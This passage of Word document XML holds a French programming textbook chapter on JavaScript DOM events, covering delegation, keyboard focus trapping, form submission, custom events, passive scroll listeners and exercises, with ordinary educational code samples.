        <w:t>document.querySelector(".onglets").addEventListener("click", (event) =&gt; {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  const onglet = event.target.closest(".onglet");</w:t>
        <w:br/>
        <w:t xml:space="preserve">  if (!onglet) return;              // clic hors d'un onglet</w:t>
        <w:br/>
        <w:t xml:space="preserve">  activer(onglet);</w:t>
        <w:br/>
        <w:t>});</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>La délégation fonctionne aussi pour des éléments ajoutés après le chargement initial : c'est son second avantage. Un écouteur direct sur un élément inexistant ne sert à rien.</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`STOPPROPAGATION` N'EST PAS UN OUTIL DE CORRECTION</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Bloquer la propagation casse la délégation des autres scripts et les comportements natifs. Utilisez-la uniquement lorsqu'un composant doit isoler un événement interne.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>27.3 Clavier et focus</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un composant interactif doit répondre au clavier. Pour un bouton natif, Entrée et Espace sont gérés par le navigateur ; pour un élément personnalisé, tout est à votre charge.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Deux usages du clavier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document.addEventListener("keydown", (event) =&gt; {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  if (event.key === "Escape") {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    fermerMenu();</w:t>
        <w:br/>
        <w:t xml:space="preserve">  }</w:t>
        <w:br/>
        <w:t xml:space="preserve">  if (event.key === "/" &amp;&amp; document.activeElement.tagName !== "INPUT") {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    event.preventDefault();</w:t>
        <w:br/>
        <w:t xml:space="preserve">    champRecherche.focus();</w:t>
        <w:br/>
        <w:t xml:space="preserve">  }</w:t>
        <w:br/>
        <w:t>});</w:t>
        <w:br/>
        <w:br/>
        <w:t>// Piège de focus dans une modale</w:t>
        <w:br/>
        <w:t>function piegerFocus(conteneur, event) {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  const focusables = conteneur.querySelectorAll(</w:t>
        <w:br/>
        <w:t>'a[href], button:not([disabled]), input, select, textarea,</w:t>
        <w:br/>
        <w:t xml:space="preserve">      [tabindex]:not([tabindex="-1"])'</w:t>
        <w:br/>
        <w:t xml:space="preserve">  );</w:t>
        <w:br/>
        <w:t xml:space="preserve">  const premier = focusables[0];</w:t>
        <w:br/>
        <w:t xml:space="preserve">  const dernier = focusables[focusables.length - 1];</w:t>
        <w:br/>
        <w:t xml:space="preserve">  if (event.key !== "Tab") return;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  if (event.shiftKey &amp;&amp; document.activeElement === premier) {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    event.preventDefault();</w:t>
        <w:br/>
        <w:t xml:space="preserve">    dernier.focus();</w:t>
        <w:br/>
        <w:t xml:space="preserve">  } else if (!event.shiftKey &amp;&amp; document.activeElement === dernier) {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    event.preventDefault();</w:t>
        <w:br/>
        <w:t xml:space="preserve">    premier.focus();</w:t>
        <w:br/>
        <w:t xml:space="preserve">  }</w:t>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">La propriété </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>event.key</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> renvoie le nom de la touche (« Escape », « Enter », « a »), contrairement à </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>event.code</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> qui renvoie la position physique. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>key</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> est presque toujours le bon choix.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>27.4 Événements de formulaire</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">L'événement </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>submit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> est le point d'entrée naturel : il se déclenche au clic sur un bouton d'envoi comme à l'appui sur Entrée. L'écouter évite de traiter le clic et de perdre l'accessibilité.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Un envoi de formulaire maîtrisé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formulaire.addEventListener("submit", async (event) =&gt; {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  event.preventDefault();</w:t>
        <w:br/>
        <w:t xml:space="preserve">  if (!formulaire.reportValidity()) return;</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">  const donnees = new FormData(formulaire);</w:t>
        <w:br/>
        <w:t xml:space="preserve">  const valeurs = Object.fromEntries(donnees);</w:t>
        <w:br/>
        <w:t xml:space="preserve">  await envoyer(valeurs);</w:t>
        <w:br/>
        <w:t>});</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.86 — Cinq événements de formulaire et leur usage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13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Événement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="344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Quand</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="344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À privilégier pour</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Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>input</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3442"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>À chaque frappe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3442"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Aperçu, compteur</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="213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change</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="344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À la validation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="344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Select, date</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Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>submit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3442"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>À l'envoi</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3442"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Traitement principal</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="213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blur</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="344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À la sortie</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="344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Validation de champ</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Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>invalid</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3442"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Si un champ est invalide</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3442"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Messages personnalisés</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>27.5 Événements personnalisés</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un composant peut émettre ses propres événements pour communiquer avec le reste de la page, sans couplage direct.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Un composant qui annonce son état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class Panneau extends HTMLElement {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  ouvrir() {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    this.hidden = false;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    this.dispatchEvent(new CustomEvent("panneau:ouvert", {</w:t>
        <w:br/>
        <w:t xml:space="preserve">      bubbles: true,</w:t>
        <w:br/>
        <w:t xml:space="preserve">      detail: { id: this.id },</w:t>
        <w:br/>
        <w:t xml:space="preserve">    }));</w:t>
        <w:br/>
        <w:t xml:space="preserve">  }</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:t>customElements.define("mon-panneau", Panneau);</w:t>
        <w:br/>
        <w:br/>
        <w:t>document.addEventListener("panneau:ouvert", (event) =&gt; {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  console.log("Ouvert :", event.detail.id);</w:t>
        <w:br/>
        <w:t>});</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Les événements personnalisés suivent la même propagation que les événements natifs. Le champ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>detail</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> transporte les données, ce qui évite d'inventer des propriétés globales.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>27.6 Fuites et performance</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un écouteur conservé après la disparition de son élément empêche la libération de la mémoire. Les composants doivent retirer leurs écouteurs au démontage.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Un écouteur de défilement maîtrisé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Écouteur coûteux sur scroll : à limiter</w:t>
        <w:br/>
        <w:t>let planifie = false;</w:t>
        <w:br/>
        <w:t>window.addEventListener("scroll", () =&gt; {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  if (planifie) return;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  planifie = true;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  requestAnimationFrame(() =&gt; {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    gererDefilement();</w:t>
        <w:br/>
        <w:t xml:space="preserve">    planifie = false;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  });</w:t>
        <w:br/>
        <w:t>}, { passive: true });</w:t>
      </w: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 PASSIVE: TRUE }`</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Sur </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>scroll</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> et </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>touchmove</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">, l'option </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>passive</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> indique au navigateur que vous n'appellerez pas </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>preventDefault</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>, ce qui lui permet de faire défiler sans attendre votre code.</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CONTRÔLE D'UN COMPOSANT INTERACTIF</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S'active-t-il au clic </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>et</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> au clavier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L'état est-il annoncé (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>aria-expanded</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>aria-selected</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>)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Échap ferme-t-il le composant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 focus revient-il au déclencheur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Les écouteurs sont-ils retirés au démontage ?</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addEventListener</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> accepte </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>once</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> et </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>passive</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>.</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DOMContentLoaded</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> est inutile avec un script </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>defer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w: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délégation réduit le nombre d'écouteurs et gère les ajouts dynamiques.</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event.key</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> décrit la touche, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>event.code</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> sa position physique.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submit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> est le point d'entrée correct d'un formulaire.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composant doit annoncer ses changements d'état.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écouteurs doivent être retirés lorsque le composant disparaît.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Les interactions sont en place. Le chapitre suivant les applique aux formulaires : validation, messages et retour utilisateur.</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27.1 — Menu déroulant complet</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 bouton ouvre une liste d'options. Implémentez le comportement complet.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Clic et clavier pour ouvrir.</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Échap pour fermer.</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Focus rendu au bouton.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 27.2 — Délégation sur une liste dynamique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Une liste de tâches peut recevoir de nouveaux éléments. Gérez la suppression sans réattacher d'écouteurs.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Écoutez sur le conteneur.</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 xml:space="preserve">Utilisez </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>closest</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> pour trouver la tâche.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que les éléments ajoutés fonctionnent aussi.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
